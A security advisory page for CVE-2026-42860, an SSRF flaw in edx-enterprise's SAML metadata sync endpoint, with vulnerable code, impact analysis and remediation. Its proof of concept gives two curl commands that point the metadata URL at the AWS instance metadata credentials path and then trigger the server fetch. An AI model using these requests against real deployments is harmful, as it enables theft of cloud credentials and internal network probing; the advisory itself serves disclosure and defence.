Skip to main content

edx-enterprise CVE-2026-42860

HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-05 https://github.com/openedx/edx-enterprise GHSA-64cv-vxpr-j6vc
8.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.5 HIGH
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 18:30 vuln.today
Analysis Generated
May 05, 2026 - 18:30 vuln.today

DescriptionGitHub Advisory

Summary

The sync_provider_data endpoint in SAMLProviderDataViewSet fetches SAML metadata from a URL stored in SAMLProviderConfig.metadata_source. An authenticated user with the Enterprise Admin role can set this field to an arbitrary URL via the SAMLProviderConfigViewSet PATCH endpoint, then trigger a server-side HTTP request by calling sync_provider_data. The fetch in fetch_metadata_xml() passes the URL directly to requests.get() with no scheme enforcement, IP filtering, or timeout.

This vulnerability was introduced when the SAML admin viewsets were migrated from openedx-platform into edx-enterprise. A related fix for the equivalent fetch path in openedx-platform (the fetch_saml_metadata Celery task) was applied in GHSA-328g-7h4g-r2m9.

Details

Vulnerable code path:

enterprise/api/v1/views/saml_utils.py:

python
def fetch_metadata_xml(url):
    log.info("Fetching %s", url)
    if not url.lower().startswith('https'):
        log.warning("This SAML metadata URL is not secure! (%s)", url)
    response = requests.get(url, verify=True)
# No IP/scheme validation
    response.raise_for_status()

enterprise/api/v1/views/saml_provider_data.py:

python
@action(detail=False, methods=['post'], url_path='sync_provider_data')
def sync_provider_data(self, request):
    ...
    metadata_url = saml_provider.metadata_source
# set via SAMLProviderConfig PATCH
    xml = fetch_metadata_xml(metadata_url)
# triggers the fetch

Missing protections:

  • No HTTPS enforcement (HTTP is allowed; the warning is not enforced)
  • No blocking of loopback (127.0.0.0/8) or link-local (169.254.0.0/16) ranges
  • No blocking of RFC 1918 private ranges
  • No request timeout

Proof of Concept

Prerequisites: Authenticated user with Enterprise Admin role for any enterprise customer with a configured SAML Identity Provider.

Step 1: Set a malicious metadata URL via the provider config endpoint:

bash
curl -X PATCH 'https://<instance>/auth/saml/v0/provider_config/<pk>/' \
  -H 'Authorization: Bearer <JWT>' \
  -H 'Content-Type: application/json' \
  -d '{"metadata_source": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

Step 2: Trigger the server-side fetch:

bash
curl -X POST 'https://<instance>/auth/saml/v0/provider_data/sync_provider_data' \
  -H 'Authorization: Bearer <JWT>' \
  -H 'Content-Type: application/json' \
  -d '{"enterprise_customer_uuid": "<uuid>"}'

The server fetches the AWS metadata endpoint. Even though XML parsing will fail, the HTTP request is made and timing/error differences confirm reachability of internal addresses.

Impact

An Enterprise Admin can use this SSRF to:

  • Steal cloud credentials: Access AWS/GCP/Azure instance metadata services to retrieve IAM temporary credentials, potentially enabling full cloud infrastructure compromise.
  • Scan internal networks: Probe internal hosts, ports, and services behind the deployment's firewall.
  • Access internal APIs: Reach databases, admin panels, or microservices not exposed to the internet.

Enterprise Admin is a delegated role typically granted to corporate training managers, not platform operators. It should not grant the ability to make the server issue arbitrary outbound HTTP requests.

Patches / Mitigations

Call validate_saml_metadata_url() (importable from common.djangoapps.third_party_auth.utils as of the openedx-platform fix in GHSA-328g-7h4g-r2m9) in fetch_metadata_xml() before calling requests.get(). A request timeout should also be added.

Operators should additionally enforce network-level egress filtering to block outbound connections from the Open edX server to 169.254.0.0/16 and RFC 1918 ranges as a complementary control, particularly to cover hostname-based URLs that cannot be validated at the application layer.

AnalysisAI

Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.

Technical ContextAI

The edx-enterprise package is a Django application that provides enterprise customer management for Open edX platforms. The vulnerability resides in the SAML provider administration REST API viewsets, specifically the sync_provider_data endpoint in SAMLProviderDataViewSet. When syncing SAML identity provider metadata, the fetch_metadata_xml() function in enterprise/api/v1/views/saml_utils.py passes user-controlled URLs directly to Python's requests.get() without validation. The code performs no IP address filtering (no checks for 127.0.0.0/8 loopback, 169.254.0.0/16 link-local, or RFC 1918 private ranges), lacks scheme enforcement (HTTP allowed despite HTTPS warning), and sets no request timeout. This is a classic CWE-918 Server-Side Request Forgery where insufficient input validation on URL parameters enables attackers to abuse the server as a proxy. The vulnerability was introduced during migration of SAML admin functionality from openedx-platform into edx-enterprise as a standalone package. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C) confirms network-exploitable, low-complexity attack requiring only low-privilege authentication with scope change, reflecting that Enterprise Admin credentials provide access beyond their intended authorization boundary.

RemediationAI

Upgrade edx-enterprise to version 7.0.5 immediately via 'pip install --upgrade edx-enterprise==7.0.5'. The patch integrates validate_saml_metadata_url() function (imported from common.djangoapps.third_party_auth.utils in openedx-platform) into fetch_metadata_xml(), enforcing HTTPS-only schemes, blocking loopback/link-local/RFC1918 IP ranges, and adding request timeouts. Vendor advisory and patch details: https://github.com/openedx/edx-enterprise/security/advisories/GHSA-64cv-vxpr-j6vc. If immediate upgrade is not feasible, implement network-level egress filtering as a temporary compensating control: configure firewall rules to block outbound HTTP/HTTPS from the Open edX application server to 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. Note this mitigation is incomplete (does not prevent hostname-based SSRF to internal DNS names) and may break legitimate external SAML metadata fetches if overly broad. Review Enterprise Admin role assignments and revoke where not operationally required; treat this role as sensitive given its API access. Audit SAML provider configurations for suspicious metadata_source URLs (particularly those pointing to IP addresses, non-standard ports, or internal hostnames) via database query or Django admin interface.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-42860 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy